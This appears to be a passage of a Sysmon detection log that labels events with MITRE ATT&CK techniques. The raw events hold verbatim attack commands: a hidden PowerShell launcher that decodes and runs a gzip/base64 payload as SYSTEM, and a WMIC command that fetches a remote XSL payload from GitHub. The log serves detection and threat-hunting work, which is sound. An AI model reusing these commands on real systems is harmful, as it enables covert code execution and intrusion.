IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-00101C1A1900</Data>
<Data Name=""ParentProcessId"">3348</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.286383,2019-07-30T01:33:58.286383+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.256845Z"">
</TimeCreated>
<EventRecordID>4945</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.245</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010E32E8B00</Data>
<Data Name=""ProcessId"">5084</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656012.106089,2019-05-01T00:26:52.106089+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:52.090464Z"">
</TimeCreated>
<EventRecordID>9807</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:51.949</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8B-5CC8-0000-00101C1A1900</Data>
<Data Name=""ProcessId"">3348</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2586-5CC9-0000-0010DC530000</Data>
<Data Name=""ParentProcessId"">460</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1594332063.89924,2020-07-10T02:01:03.899240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-09T22:01:03.898570Z"">
</TimeCreated>
<EventRecordID>311373</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3280"" ThreadID=""1044"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-09 22:01:03.894</Data>
<Data Name=""ProcessGuid"">747F3D96-939F-5F07-0000-0010888E4600</Data>
<Data Name=""ProcessId"">7456</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-86FA-5F07-0000-00204A8B0600</Data>
<Data Name=""LogonId"">0x68b4a</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-86FC-5F07-0000-00101E4B0700</Data>
<Data Name=""ParentProcessId"">2356</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436034.630548,2019-07-30T01:33:54.630548+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:54.246154Z"">
</TimeCreated>
<EventRecordID>4941</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:54.044</Data>
<Data Name=""ProcessGuid"">747F3D96-6642-5D3F-0000-0010F69D8A00</Data>
<Data Name=""ProcessId"">4896</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6641-5D3F-0000-0010A38C8A00</Data>
<Data Name=""ParentProcessId"">4260</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028567.80776,2019-03-20T00:49:27.807760+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:49:27.787731Z"">
</TimeCreated>
<EventRecordID>1966388</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:49:27.697</Data>
<Data Name=""ProcessGuid"">365ABB72-55D7-5C91-0000-001067BD0700</Data>
<Data Name=""ProcessId"">2236</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
